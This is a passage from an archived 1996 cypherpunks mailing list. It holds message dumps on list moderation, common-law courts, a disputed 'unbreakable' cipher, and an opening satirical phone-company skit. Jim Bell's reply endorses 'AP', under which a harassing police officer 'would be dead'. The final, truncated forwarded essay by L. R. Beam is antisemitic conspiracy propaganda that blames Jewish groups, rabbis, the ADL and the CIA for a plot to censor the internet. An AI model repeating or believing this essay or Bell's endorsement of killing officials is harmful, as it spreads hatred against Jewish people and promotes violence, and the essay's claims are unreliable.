little company called MCI, see, and there's this _other_ little company
called BT, and...

 {rrring-rrring}

Operator: "Thank you for using MonoTel: and how may we help you today?"
You:      "I'd like to place a call...?"
Operator: "And who would you like to call today, Sir?"
You:      "Uh, my big bother Sam in Washington, please. He's at 212, 555..."
Operator: "I see. Hrmm, let me see if management says it's OK for me to
           dial that number for you... please hold while I look up our
           policy on you calling your family."
 {long pause}
Operator: "Hello, Sir?
You:      "Um, yes, hello?"
Operator: "Um, Sir, have you paid your phone bill for today?"
You:      "Well, gee, I _think_ so... how much was it for today?"
Operator: "Well, our rates went up again at Noon, so that may account for
           the discrepancy. Let me connect you to our Loan Officer so you
           can arrange payment..."
You:      "No, PLEASE, I just need to call my brother, plea-"
Operator: {click... buzz... whirr}
Loan Ofcr:"Hello. Loan Department. May I please have your 20-bit
           customer fingerprint?"
You:      "Uh, sure. Let's see.... 01 D4 3E...{etc}...C2 0A."
Loan Ofcr:"OK, fine. Now, what can I do for you today, Sir?
You:      "Look, I just want to call my big brother Sam in DC, and they
           connected me to you instead..."
Loan Ofcr:"Oh, I see, and have you paid your daily bill today, Sir?"
You:      "Well, I THOUGHT I did. I went to the telephone, I inserted my
           MonoTel smartcard and I dialled the passcode. Then it sucked the
           card in and didn't give it back to me! I figured it was enough."
Loan Ofcr:"Well, it happens to allof us, Sir, don't feel bad. Now, what
           sort of collateral will you be putting up for this call? Do you
           own or rent?
You:      "Well, I used to own, but then I decided to add a modem line, so
           I had to refinance..."
Loan Ofcr:"Ahhh, so this will be a third or a fourth phone mortgage for
           you?"

   dave

____________________________________________________________________________
"The Occupational Safety & Health Administration (OSHA) has determined that
 the Maximum Load Capacity of my butt is two (2) persons at one time,
 unless I install handrails or safety straps. As you have arrived sixth in
 line to ride my ass, please take a number and wait your turn. Thank you."

________________________________________________________________________
Dave Del Torto                                      +1.415.65432.31  tel
Manager, Strategic Technical Evangelism             +1.415.631.0599  fax
Pretty Good Privacy, Inc.                        http://www.pgp.com  web






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 14 Nov 1996 19:27:03 -0800 (PST)
To: Black Unicorn <sandfort@crl.com>
Subject: Re: Conspiring to commit voodoo
Message-ID: <199611150326.TAA07305@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:57 PM 11/12/96 -0500, Black Unicorn wrote:
>A friend of mine tells an interesting story.
>On driving to a convenience store early in wee hours, he sees a man
>splayed across the hood of a parked car, perhaps dead.  Being the good
>citizen he is he tracks down a police car and reports the incident.
>Instead of investigating the "body," the police decide to pull him over
>and write him $700 in tickets for various fictitous violations (all of
>which were later thrown out).  He, as would any reasonable
>citizen, protested, not so much for the tickets, but for the
>possibility that the prone man might need medical attention.
>(The incident was not called in on the radio).  He took the
>tickets and remarked something to the effect of, "I can't
>believe this is what one gets for trying to be a good citizen,
>trying to get involved."  Officer's response:  "Yep.  Next time 
>don't bother."  Eventually, some 30 mintues later the police drive to the
>location and revive what was a sleeping bum, take my friend to the station
>and make him wake his wife to bail him out to the tune of $250
>Total cost: $300 in legal fees to fight the "violations."


This story further confirms my lack of respect for Unicorn.  

While this story certainly teaches us to avoid contact with the police, it 
turns out that it ALSO shows that, ultimately, the current system is 
apparently set up to profit lawyers, police, judges, and other vermin.  
Those groups made out just fine as a consequence of the above incident:  The 
cop(s) harassed a "safe" victim, rather than actually going out and doing 
their job.  A lawyer got paid the money for, at best, merely ceasing the 
harassment the cops started.  The judge made it all look "legal," although 
not proper, and could feel good about himself for (aside from collecting his 
paycheck) turning the victim loose.  In short, the harassment wasn't UNDONE, 
it was merely STOPPED, for now.  The cops had, in fact, succeeded in causing 
the victim to lose $300.  Which, interestingly enough, was  probably the 
point of the whole exercise.

AP, on the other hand, would have fixed this problem, permanently.  The cop 
would be dead, eventually if not immediately.  The lawyer would be out of a 
job, as well as the judge.  In practice, AP would have deterred all such 
abuse, which means that it would have succeeded where Unicorn's implicit 
recommendation ("get a lawyer") would have failed.




 

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Thu, 14 Nov 1996 19:21:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ??????????????????????
In-Reply-To: <009AB5CC.FF1721B2.131@papa.uncp.edu>
Message-ID: <328BE1A2.29AF@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


newtonm@papa.uncp.edu (We Know Where You Live) wrote:
> 
> I have a breif question for all you folks out there....
> Does anyone know the email address and procedure for sending your mail 
> via "cypherpunks" so that it changes your e-mail address so that the 
> person recieving your e-mail message sees on the mesage that its only 
> from an anonymous source?

Nope. Never heard of such a thing. If you ever figure it out, be sure to 
get back to us.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 14 Nov 1996 17:06:12 -0800 (PST)
To: hyperlex@hol.gr (George A. Stathis)
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <199611140715.FAA01670@prometheus.hol.gr>
Message-ID: <199611150122.TAA00419@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


George wrote:
> At 06:34 =EC=EC 13/11/1996 -0500, Mark M. wrote:
> (in response to):
> >Governments maintain a monopoly on land, so the "love it or leave it"=
>  mentality
> >is flawed.  Virtual space does not have the same limitations as physical
> >space.  Starting your own mailing list is relatively easy.
> Not at all easy, for a lot of people. Moreover, it's very time-consuming.
> It's only easy if you are prepared to put up with costs of time, money,
> and also... service providers (who don't always agree with you)...

     It is not that difficult in term of money or access to start a 
mailing list. 

    I believe there is a equation that operates in life that goes something
like this:
   
    Intelligence + Money + Time * will = Results 

    As one goes up, the other two can drop. Will is kinda nebulous, but is 
always less than result.

    I am not a rocket scientist, but I was able to get majordomo to work
(to a degree) on a server I own, yes, I own the server, and no, I don't 
pay for it with cash. I do a favor for someone, and they gave me the 
machine (http://www.encodex.com/~pov to see the favor). The access is 
provided by some people I occasionally do work for, as long as the machine
is not causing a problem, or too much bandwidth, they let me run it.

    This would make the equation:

    Intelligence + money + time * will = Result
        Some     +  0    + a bit * some = A server with 4 or 5 mailing lists. 

> In a lot of places in the world, starting mailing lists is almost
> impossible unless you can be _inside_ an Internet Provider Company
> (and use Unix or whatever they use, in their own machines).
    
     A simple mailing list could simply be a 8 dollar a month email account
with a long .forward file.  

> Man you're nutts. There are very few and quite vast Media Companies
> in the world, and they're on the verge of becoming monopolies.

     For every "tentacle" of the Vast Media Conglomerates, there is 
some loose nut with a photocopier (or access to Kinko's). 

> Even your American President is in reality a puppet of the Trilateral
> Commission, who effectively also control CNN, the Washington Post,
> and many many many other things all over the world.

     WHO is nuts? 

> And you are saying that control of the media by ownership is
> impossible?  You're far out maaan! :-)
> Only in America such a naive opinion could actually be _believed_.
> (here I go again... aga! :-) )
> George
> P.S. Even if you offered me a million dollars I'd stay away from
>      your country. My sanity is much more valuable.  :-)
>      (The Immigration Authorities in the U.S. have missed the point:
>       We DON'T want to come to you guys. It's the last thing we'd want!)

     One of these days reality is going to hit you like a runaway 
freight train. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Fri, 15 Nov 1996 07:38:57 -0800 (PST)
To: wichita@cyberstation.net
Subject: Re: Q.E.D |= Montgolfiering + Inbongis + Fermented Pear Juice
Message-ID: <848071227.510148.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



>          Since the IPG algorithm is impregnable, obviously no
>          individual, or collection of individuals, from said
>          Universities, the Cypherpunks, or the Coderpunks has been
>          able to crack the system. Of course, this inability to do the
>          impossible applies not only to the present but for all time,
>          for all eternity."


Look, 

do you seriously think that university researchers, professors and 
data security consultants have nothing better to do with their time 
than look at your pathetic collection of cryptographic stocking 
fillers.

I thought you had finally gone away when I saw no posts from you for 
about a week. I am depressed beyond belief to see you have returned 
to interrupt the flow of discussion.... Leave and never return...

I truly have never hear anyone speak as much bollocks as you in my 
entire life, even those who have studied the art for many years...

 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Fri, 15 Nov 1996 09:29:56 -0800 (PST)
To: strider@cyberstation.net
Subject: Re: The Key for the IPG 200 Megabytes at NETPRIVACY.COM
Message-ID: <848071226.510145.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> In response to the numerous requests for us to post the key that we used
> to produce the almost 200 megabytes of raw encryptor stream at our web
> site, we are pleased to provide the ASCII values of same as follows: 

Numerous requests? - I was right, he is halucinating...


> In order for those few who have not had the opportunity to check it out,
> we will leave it up another week and then take it down and put up a
> new shorter one, maybe a 2,560,000 byte one permanently and a monthly
> 2,560,000 byte one where we publish the key each month. 

No-one wants to... 

> Of course, no university, coderpunk( no offense intended please), or
> cypherpunk , or any collection of same has broken the system, nor will
> they ever.  As most of you now know, it is unbreakable. We have had over
> 100 universities, IBM, Microsoft, Intel, several dozen different
> government agencies,  and thousands of others to download the data and
> look at the algorithm. Of course, like everyone else, they have been
> benighted.

Oh do be quiet you self satisfied smug little man.


Every single member of this list and indeed of other forums in which 
you post (I don`t know of any but I assume it is not just us you 
annoy) knows you are a fool.

Some while ago I seem to recall you offering to sell your company for 
one dollar if anyone could break your last algorithm, it was sumarily 
broken - why are you still owner of the company? - Oh I get it, they 
wouldn`t pay a dollar for it, neither would I. But seriously, was 
this you, and why didn`t you sell the company, and how are people to 
trust you now knowing this past debacle...

Go away, you are like an unpopular bore at a party who doesn`t seem 
to realise that everyone wants him to leave....

 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Benjamin Grosman <bgrosman@healey.com.au>
Date: Wed, 13 Nov 1996 23:29:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Worrying...
Message-ID: <199611140830.TAA26347@sydney.healey.com.au>
MIME-Version: 1.0
Content-Type: text/plain



Isn't it worrying that so many people can happily devote their time to trying to annoy others?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 14 Nov 1996 19:40:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: A Disservice to Mr. Bell
Message-ID: <199611150340.TAA08395@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:14 PM 11/14/96 -0500, hallam@vesuvius.ai.mit.edu wrote:
>
>>As for the "self-selected" issue:  In almost all areas of human endeavor, 
>>things are (often?  usually?) done by people who are "self-selected."  I 
>>suggest that there is simply no reason that even "self-selected" courts 
>>cannot work.
>
>Oh I forgot to mention, last week we found you guilty of sedition, it
>was a pity you were not present to put your case but maybe if you had 
>bothere to read the court roster you would have attended.

You might be surprised to learn that this kind of thing doesn't bother me at 
all.  To whatever extent such commonlaw courts act like loose cannons, they 
will primarily tend to do so against those who are most abusive of the 
public's perceived rights.  Like a non-lethal version of AP, those people 
who are most abusive of the public (primarily current government employees 
and officeholders) will be named most often in commonlaw court proceedings.  
Eventually, they will begin to behave.

>>1.  Commonlaw courts predate the US Constitution by a few hundred years.  
>>The former does not depend on the latter for authority or credibility.  
>
>Untrue, the US constitution replaced all previous constitutions.

But commonlaw courts were not a product of previous constitutions.  And the 
US constitution certainly didn't "replace all previous constitutions":  
state constitutions were "replaced."    The only document the Federal 
constitution arguably "replaced" was the Articles of the Confederation.

> Thats
>what the supremacy clause is all about. All previously existing courts
>were extinguished.

Ah!  So you admit that these courts were "previously existing," huh?  Well, 
if that's the case, merely read the 9th and 10th amendments and tell me how 
you're so sure that "all previously existing courts were extinguished."


>>2.  The US Constitution is, at most, a statement of the authority of the 
>>FEDERAL portion of government.
>
>It also includes a supremacy cluase and a "due process" clause. The
>due process clause means amongst other things that noone can be subjected 
>to proceedings that are not authorised under the constitution.

Anyone in state court are "subjected to proceedings that are not authorized 
under the [Federal] constitution."  Clearly, state courts operated before 
the Federal Constitution existed.  And the "due process clause" may simply 
apply to the Federal government, not necessarily all individuals or the 
organizations they form.


>>3. The Federal Constitution only references states, and I don't think it 
>>references state Constitutions at all.
>
>There is no logical reason why it should, if a state exists it has a process
>of government, a boundary to its authority and performs legislative,
>excutive and judicial functions. The explicit recognition of the states
>was necessary since otherwise the supremacy clause would claim to extinguish
>their rights. 

There's a big inconsistency with what you just said.  It was the 
representatives of the STATES which WROTE the US Constitution.  Their 
ratification was _necessary_ to approve that document.  If states were not 
recognized, nor their representatives, they would have been unable to ratify 
the Federal constitution.  It would be, therefore, totally illogical to 
believe that the product of their writing could somehow "extinguish" the 
rights of the citizens, let alone the states.  You're obviously confused.


>The authority of the states to make law is explicitly 
>stated.

Whatever it said, it was not necessary to have said it.  The 9th and 10th 
amendments make it clear that any power not explicitly granted the Feds was 
reserved to the states or the people.


>>You should have said, SOME courts.  Not "the courts," implying ALL the 
>>courts.  Notice that the US Federal Constitution (at least, to my 
>>recollection) does not describe or regulate state courts, or for that matter 
>>local courts.
>
>It recognises the states, and thus their constitutions. If you can find 
>a state which omitted a supremacy clause from its constitution then you
>might have a point.
>
>
>As a practical matter however the immediate effect of claiming to issue
>proceedings under "common law courts" is from now on almost certain to 
>be criminal and civil proceedings followed by long jail sentences.

Oh, really?  It certainly isn't "criminal."  At most, you might try to claim 
that it is legally irrelevant.  After all, if commonlaw courts don't really 
exist, then nothing they do has legal weight, and thus it's a legal nullity. 
 But your commentary seems to indicate that no, what commonlaw courts do is 
not only real and significant, it's also going to be called "criminal."  In 
other words, it's a threat to the existing legal monopoly.


>While Jim Bell can pick nits and pretend that he is a lawyer the people
>recognised as lawyers in our society act in a different matter. 

All of whom are trained to recognize the existing legal monopoly.

>It is 
>an empirical fact that those convicted in federal and state courts
>go to jail, those convicted in "common law kangeroo courts do not". In
>fact the only people who do are the judges, jurors and other 
>instigators.

Of what relevance is this?  Sending a person to jail is only one of many 
ways a court can exercise its power.  


>It is an empirical fact that the authority of "common law" courts 
>is not recognised by society. 

"Society"?  I think you mean "the people who believe they are in charge."  
The "thuggerati" would be one way to identify them.

The vast majority of the population of the US are simply unaware of 
commonlaw courts.  In fact, it's quite possible that the vast majority of 
the population can't quote even a single law verbatim.   The average person 
knows nothing of the history of commonlaw courts, and therefore what he 
"recognizes" is unlikely to include them  


>They can be dealt with easily enough,
>the intended victim need only apply to a real court for an injuction
>prohibiting proceedings,

What "proceedings"?  You just said that commonlaw courts do not exist, and 
that their actions are legally irrelevant.  Why should an "intended victim" 
NEED to "apply to a real [sic] court for an injunction"?  An "injunction" is 
generally obtained to prevent somebody from doing something that he'd 
otherwise have the power (and, often, the right) to do absent the injunction.


>turn up to the "court" to serve the injunction
>and if people insist on proceeding apply to the real court for 
>enforcement of the original order since anyone participating in the 
>"common law court" would then be in contempt. 

They would only be "in contempt" if their actions were legally relevant, 
which you have already denied.


Your problem is obvious:  You're desperate, and you can't promote a 
consistent argument.  I, far more honestly, started by pointing out the fact 
that commonlaw courts are but one type of court, and they were in 
competition with equity courts in England for centuries.   It's a power 
stuggle, quite analogous to the free market, and if anything their long 
absense  will only make the competition keener.  Naturally, the opponents of 
commonlaw courts  (and, "opponents" are exactly what they are; they are 
biased on one side of the issue) want to deny past reality as well as 
prevent the resurgence of those courts.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 14 Nov 1996 19:39:19 -0800 (PST)
To: John Anonymous MacDonald <nobody@cypherpunks.ca>
Subject: Re: Cryptoanarchy in the field
In-Reply-To: <199611150137.RAA16422@abraham.cs.berkeley.edu>
Message-ID: <Pine.SUN.3.91.961114193318.12707A-100000@crl8.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 14 Nov 1996, yet another John Anonymous MacDonald wrote:

> How many people in Singapore speak English?

Essentially all of them.  It's the main official language.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 14 Nov 1996 19:47:15 -0800 (PST)
To: John Young <jya@pipeline.com>
Subject: No Subject
In-Reply-To: <1.5.4.32.19961114131814.006c3730@pop.pipeline.com>
Message-ID: <199611150347.TAA10625@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>Cypherpunks does not seem to me to be anything like the well-
>regulated lists you ascribe to Prof Volokh.
>

Declan should rest his point here. the cpunk listis notorious
for being way astray. yet cpunks continuously argue against
anyone with a moderator type role. could there be some correlation
between lack of moderation/leadership on the list and the 
piles of noise that people incessantly complain about? of 
course I'm insane for suggesting this.

I've repeatedly advocated
the usefulness of a good moderator. cpunks believe that such
a role is anti-anarchic (which it is), and therefore bogus.
the root of this is deeper, it relates to the psychology of
EH, TCM, JG who all have very love-hate relationships
with leadership.

this list suffers neglect by its creators 
unlike any other mailing list I know of in cyberspace, and
they are proud of that neglect, instead they call it "anarchy"
and claim it is a major blessing.

I think many people need to learn a lesson that cyberspace
doesn't change certain basic realities, such as how important
a dynamic leader is in forward motion in any area. but they
will have plenty of opportunities to learn over the next
few years and decades. and I'll be snickering in the sidelines
as long as they wonder aloud why their realities are as
they are and they find the deficiencies therein inscrutable.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.net>
Date: Thu, 14 Nov 1996 20:06:27 -0800 (PST)
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: PGP3.0 & ElGamal
In-Reply-To: <Pine.SUN.3.94.961113224825.7335F-100000@polaris>
Message-ID: <199611150406.UAA04043@blacklodge.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I'm still mildly curious as to why support for >128 bit keys is not
> available in any form I know of.

	What do you mean? 3DES ships with Stronghold, and will ship
with C2Net's other products as well.

-- 
Sameer Parekh					Voice:   510-986-8770
President					FAX:     510-986-8777
C2Net
http://www.c2.net/				sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com
Date: Thu, 14 Nov 1996 17:13:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Censorship on cypherpunks?, from The Netly News
Message-ID: <199611150113.UAA25639@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Declan McCullagh wrote:
> 
> The mere fact that a privately-owned discussion group becomes popular 
> does not mean that it becomes a public forum.

This is true. On the other hand, privately-owned public forums do exist. 
Chartered FreeNets, for example, and the facilities of private Universities 
like Carnegie Mellon. There may be a fine line somewhere, but I don't 
believe we need to draw it, because what is at issue here is the character 
of the moderator, not the legality of his action.

We're just spinning wheels here talking in the abstract. I actually agree 
with Vulis's reasoning -- you need to look at the facts of the case in 
order to determine whether an act of censorship, or heckler control, or 
editing, or whatever, was proper. But apply that reasoning to Vulis's case, 
and you conclude that he's completely in the wrong, by any standard.

> Say I start a poetry mailing list to discuss Blake's writings. I have
> three people on it. One becomes obnoxious and emailbombs the list 
> since he disagrees with my interpretation of "A Memorable Fancy." Do I 
> have the right to kick him off? 

Clearly. And if your statement of the facts is correct, then you would be 
right in exercising your right. If there is more to the story, though, or 
if your story is wrong... well, then you still have the right to be a jerk, 
but you are, nonetheless, a jerk. In the cypherpunks case, though, the only 
jerk here is Vulis. It is worthless and IMO dangerous to prove that by 
arguing from first principles. The "Freedom Knight" kooks are correct in 
pointing out that every "philosophical" argument you've made can be and has 
been misused. Try a little empirical evidence; there is plenty to go 
around. "Truth is far more fragile than fiction... reason alone cannot 
protect it." Proof is syntactic; truth is semantic.

> How is this different from a private poetry reading in my home?

It differs in one small but important way: it all happens in the digital 
domain, so it can all be archived in its entirety. It is more difficult to 
lie about what happens online (but not impossible, as Vulis and company 
demonstrate). In an online forum, you have access to *all* the empirical 
evidence. There's no reason to rely on pure reason.

So enough already with the hypothetical cases. You've got a specific case 
of your own that, oddly, you still haven't mentioned.

- -rich


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMovDK5NcNyVVy0jxAQGjIAH8DTYuUzkwt7+9i4RNCPkspNBEj7MBoH0Z
CluHlmULFdamQ1HPDAXRct/DoqPzsXR+IzlMOr0y4bPFtMq1y+kEZw==
=TA0F
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Thu, 14 Nov 1996 20:15:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Could Declan or some libertarian explain this?
Message-ID: <Pine.GUL.3.95.961114200538.29970B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


>From the so-called fight-censorship list. I would ask there, but the list
owner won't let me, and I won't stoop to Vulis's level.

|        PLEASE MARK MY WORDS: IF MY BOOK IS NOT RE-PUBLISHED AND AVAILABLE
|IN BOOKSTORES, THE CAUSE OF ACADEMIC FREEDOM IN THE WEST WILL BE IN A SORRY
|STATE.  FEW ACADEMICS WOULD BE PREPARED TO SUFFER THE MANY BLOWS AND
|THREATS THAT I HAVE NOW ENDURED FOR SIX MONTHS. IF 'The 'g' Factor'
|DISAPPEARS, SO WILL OTHER SERIOUS PRODUCTS OF RESEARCH AND SCHOLARSHIP --
|ESPECIALLY IF THEY ARE DEEMED "CONTROVERSIAL" BY THE LIBERAL-LEFT. 

His complaint is that his publisher stopped distribution of his book arguing
that blacks are mentally inferior to whites.

Could someone please explain to me how Chris Brand is different from Vulis? 
I mean in form; in practice, Declan is bashing Vulis for not recognizing
rights of private editorial control, but uncritically passing on Mr. Brand's
message alleging that private editorial control is censorship. Far be it
from me to criticize Declan's right to exercise editorial control over
substantive dissent and factual correction, but I was just wondering. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kb4vwa@juno.com (Edward R. Figueroa)
Date: Thu, 14 Nov 1996 18:32:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: The Conspiracy To Erect An Electronic Iron Curtain
Message-ID: <19961114.205947.7711.21.kb4vwa@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


An Essay by L. R. Beam 


The internet, perhaps the last truly free means of information exchange
in the Western World, may soon be choked by censorship and governmental
controls. The circumscribing of the net may cause the death of what has
become the first people-to-people exchange of ideas and information on a
world wide basis. The forces behind this effort appear at first glance to
be an unlikely coalition of conspirators, the CIA, some Jewish Religious
groups, and various foreign governments. While this unholy alliance for
censorship and control may seem unusual to some, politics makes the bed
for these strange fellows. Indisputably, an international cabal of
special interest groups both within and out of governments are working
both openly and secretly to end the unregulated direct exchange of
information between people. At stake is nothing less then the regaining
of information control which the internet has shattered. Up for grabs is
nothing more than the thinking and decision making abilities of informed
men. 

Information has flowed from the top down for most of this century.
Filtering of information by middle men from government, newspapers, radio, and then television has left most Americans depending upon Paul Harvey
"for the rest of the story." Suddenly, almost without warning, the
internet mushroomed into popularity connecting people all over the world
together electronically and thereby threatening the power of those who
disseminate information. If information is power, then the control of
information is more power. The ideas of men are shaped by what they are told. For those who hope to erect a "New World Order" upon what they view
as the antiquated ashes of free speech, control of the internet has
jumped to near top of the list of "things to do." Governments and
religious groups manipulate and control people by what they are allowed
to know or not know. A decision has been made by the information brokers
to end unregulated information exchange. Overnight the propaganda begins
as these forces build their case for control and censorship. 

Quickly the nightly news lights up with horror stories of pornography on
the net. Minutes later the same channel runs four hours of lurid
programming bringing profanity, sex, sodomitizers and violence into the
homes of viewers who were just shocked about porno on the net.
Newspapers carrier feature length stories about children being lured
from home over the computer telephone line, as if somehow typing a
request to a child for sex over the phone line is more effective than
saying it over the same phone line. The Anti-Defamation League issues a
report saying that bomb plans can be found on the net along with anti-
Jewish opinion. As if the same were not available in every public library in the United States. Politicians in Washington began to talk about
"protecting the children." The same politicians who's destructive social
policies and no win wars have destroyed more mothers sons than all the pagan empires of the past. Rabbi Abraham Cooper calls for censorship of politically incorrect ideas in Canada and asks for the establishment of an
"internet police." A delegation from the Nazi- hunting Simon Wiesenthal
Center in Vienna Austria, which has for the most part ran out of eighty
year old former Nazis to hunt, takes on the new task of information
censors and asks Italian Prime Minister Lamberto Dini, European Union
president to back World Jewish Congress initiatives to stop those who disagree on the impact and importance of the holocaust from using the
internet. Then in a joint effort of the ADL and the Simon Wiesenthal
Center letters are mailed to Internet service providers in early 1996
urging providers not to carry messages that contain non-complimentary
opinion about Jews, which is quickly labeled as "cyberhate speech." This
is but a glimpse of the public efforts of the information censors to
unleash "info police" on the net. It is clear that those who have previously served as the middlemen of politically correct information are
distraught at their having been taken out of the loop. 

Meanwhile, sources within the federal government, who wish to remain
unnamed, reveal that there are considerable behind the scene efforts to
bring the flow of information under government control. In the
labyrinthine bunkers of the CIA in Arlington Virginia, a team of
planners has begun discussion on how to control the net by establishing
internet node servers throughout the system that will act as a
"strainer" of unwanted electronic information flow (there are
indications this process has begun now). The Army Security Agency (ASA),
which has the worlds most sophisticated signals intelligence and electronic monitoring capabilities has began setting up clandestine servers to
monitor traffic, catalog, classify, and achieve. 

>From the above sampling of events, it is clear that both government and
pressure groups with sacred cows to defend have determined that
uncontrolled information flow between people is a threat to their
interests. The results of this statist thinking will lead to a "war on
information" similar to the "war on drugs," curtailing free speech and
informed opinion. Like the war on drugs the real objective will not be
to save society but rather to control society. CYBER WARS are breaking out between the people and government over the flow of information. What
is wanted by these would be internet thought police is nothing less then
the right of government and religious (in this case Judaism) imprimatur
on the transfer of electronic information: an electron iron curtain. 

Efforts at censorship by religious groups are not new to this continent.
The Spanish Catholic church which saw nothing of value among the
writings of Aztecs and Mayans ordered their books burned in contempt. Like them, Rabbi Abraham Cooper and the Anti-defamation League see nothing of value in the words of those who beg to disagree. Black robed priests
yelled the smear words of the 16th century "Vile heretic!" and labeled
non-catholics "pagan savages." Rabbi Cooper and his religious cohorts of
the new inquisition cry "anti-Semitic" and label those who believe
differently "hatemongers." The words have changed, but for those
shouting them the objective is the same: eliminate the opposition, the
opponent is never answered; he is discredited. Fear kept many silent who
would have otherwise opposed the Catholic Inquisition. Fear of the rack
and straps of being labeled anti-Semitic will keep many quite today. The
call now for censorship by Rabbis is much like the pyres of Priests in
the fifteenth century it is an electronic equivalent of book burning.
The zealots willingness to accept only his personal vision of the world
around him has led mankind down this same pernicious path before.
Intolerance it is clear, is not solely a non- Jewish characteristic. A
new inquisition has begun. This one will seek out the heretics of the
internet for the stake. Each age it seems, has it's TORQUEMADA. 

A warning of what is to come: as the Federal Government, Anti-Defamation
League, and the Central Intelligence Agency seek to squelch or control
the net, look for senseless acts of random electronic violence. These
acts of subterfuge will be committed by computer nerds at CIA and the ADL or their agent provocateurs and will appear to have been perpetrated by
"white racists," "neo-nazis," "patriots," "extremist anti-government
radicals," "hackers," or other identifiable dissidents of the right and left. The purpose of these incidents will be similar to those of a drive
by shooting to terrorize people into submission. In this case consent is
wanted for censorship rather than drug turf but the principal is the
same: a political/religious gang wants control. Understand that
establishment media, as the propaganda arm of the government, will on
cue make the call for censorship of the net. Those who have the
resources to employ the best politicians money can buy also own
newspapers, radio and television networks, for all serve their design.
That design being the control of people through the filtering of
information and repressive laws. After investing billions of dollars in media/information empires and politicians, all geared to work in tangent
keeping people under control, these modern day equivalents of the book
burners of former ages will not willingly let unfettered information
exchange hinder their efforts. With at least four federal agencies (FBI,
CIA, FINCEN, and ASA) investing hundreds of millions in advanced computer
systems designed solely to monitor and track people technological warfare
between the people and government will be a major component of the rest
of this century and perhaps longer. 

The new head of the CIA John Deutsch was hand picked by Bill Clinton and
his backers to carry forward plans for a technological police state to
rest upon the typical shoulders of bullet proof vests, black boots, and
front doors shattering under their assault. Air Force Lieutenant Colonel
Edward G. Lansdale, CIA operative par excellence, personally recruited
the new CIA director for his first Government job in the early 1960's at
just 22. Deutsch became one of Secretary of Defense Robert MacNamara's
('we never intended to win in Viet Nam') whiz kids in the Pentagon who
would help to design the Vietnam War; a slaughterhouse for other kids
not so fortuity as to have political connections. Deutsch has held
political posts under Democratic administrations and advisory or
academic positions during Republican administrations. Deutsch became
part of the elite permanent government of the United States that is
accountable to no one, and immune to the oversight process. The shell
game of elections and political parties have no effect on their
careers.. This select cadre move in and out of various Federal agencies
and advisory positions, always on the public dole, never elected,
spending their entire lives trying to control the affairs of others.
Much like the secret CIA Air Base (Area 51) at Groom Lake in
southeastern Nevada, there is an aureole of secrecy surrounding their
lives and functions. Deutsch's grandfather was a diamond merchant who
ran the Zionist Federation of Belgium and he is therefore expected to
work closely with the ADL and other pro-censorship groups. President
Clinton appointed Deutsch as Director Central Intelligence in May of
1995 at the moment when the bombing of the Federal kindergarten in
